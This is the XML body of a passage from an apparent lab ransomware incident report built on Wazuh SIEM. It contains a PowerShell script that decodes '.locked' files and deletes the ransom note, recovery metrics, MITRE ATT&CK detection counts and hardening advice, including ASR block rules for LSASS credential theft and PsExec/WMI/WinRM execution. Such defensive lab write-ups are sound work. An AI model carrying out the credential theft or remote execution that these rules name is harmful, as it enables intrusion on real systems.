        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$lockedFiles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base64 encrypted content</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$b64Content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ReadAllText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FullName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. Decode back to original binary bytes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$originalBytes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Convert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FromBase64String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$b64Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. Restore original filename structure</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$restoredName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FullName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'\.locked$'</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WriteAllBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$restoredName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$originalBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. Remove malicious locked artifact</w:t>
      </w:r>
      <w:r>
        <w:br/>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Path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FullName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"[âœ“] Decrypted and Restored: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Split-Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$restoredName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Leaf</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5. Purge extortion note</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$ransomNote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$targetFolder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\README_HOW_TO_RECOVER.txt"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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$ransomNote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Remove-Item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$ransomNote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Force</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"[+] Purged extortion artifact: README_HOW_TO_RECOVER.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ForegroundColor Yellow</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.3: Execution of the SOC Decryption Utility Restoring All 10 Records</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3207626"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Decrypting Files" title="" id="102" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_3_decrypting_files.png" id="103" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3207626"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId104">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_78d36e3d52aaa9a2a5dadc50be864f40fd84199"/>
      <w:r>
        <w:t xml:space="preserve">6.3 Recovery Verification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Restoration Rate:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">100% (10 of 10 financial records</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Quarterly_Report_1.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">restored).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity Validation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Zero byte corruption verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Extortion Artifacts:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">README_HOW_TO_RECOVER.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permanently excised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">FIM Chain of Custody:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wazuh FIM continuously audited the recovery phase, recording clean file restorations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_d27a5665efa143e499aafbaeeb3848a2d2a1aaa"/>
      <w:r>
        <w:t xml:space="preserve">7. Metrics &amp; Visualization Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------------------------------------------------------------------------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|                       WAZUH SOC METRIC SUMMARY                                |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------------------------------------------------------------------------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Total Events Captured During Incident Window:  908+ Events                   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Maximum Rule Severity Triggered:               Level 14 (Critical)            |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Primary MITRE ATT&amp;CK Tactics Detected:                                        |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   â€¢ Impact (T1486):                             908 Hits                      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   â€¢ Privilege Escalation:                       252 Hits                      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   â€¢ Defense Evasion:                            243 Hits                      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   â€¢ Credential Access (T1110):                  127 Hits                      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   â€¢ Inhibit System Recovery (T1490):            2 Hits (Custom Rules 100100)  |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Target Endpoint:                               WinServer-Target (ID: 001)     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Attributing Attacker IP:                       192.168.56.102 (Kali Linux)    |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_b02e4dd557ae6ee86c4618cdf3b53aae9c8acc4"/>
      <w:r>
        <w:t xml:space="preserve">8. Strategic Post-Incident Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privileged Access Workstations (PAWs) &amp; Port Hardening:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict WinRM (Port 5985/5986) and SMB (Port 445) strictly to designated jump hosts via Windows Firewall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Factor Authentication (MFA):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce MFA across all administrative logon pathways.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Surface Reduction (ASR) Rules:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable ASR:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Block process creations originating from PSExec/WMI/WinRM commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d1e49aac-8f56-4280-b9ba-993a6d77406c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable ASR:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Block credential stealing from LSASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Immutable 3-2-1-1-0 Backup Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintain offline, air-gapped, or cloud WORM immutable backups protected against Volume Shadow deletion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Active Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure Wazuh Active Response to automatically drop connections and sever network interfaces upon detection of Rule</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">100100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Report Certification:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">This report was produced by Mohammad Hasnain Ali following hands-on adversary emulation, SIEM engineering, rule optimization, and live incident containment.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19" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_1_ubuntu_wazuh.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_2_windows_victim.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_3_kali_attack.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId32" 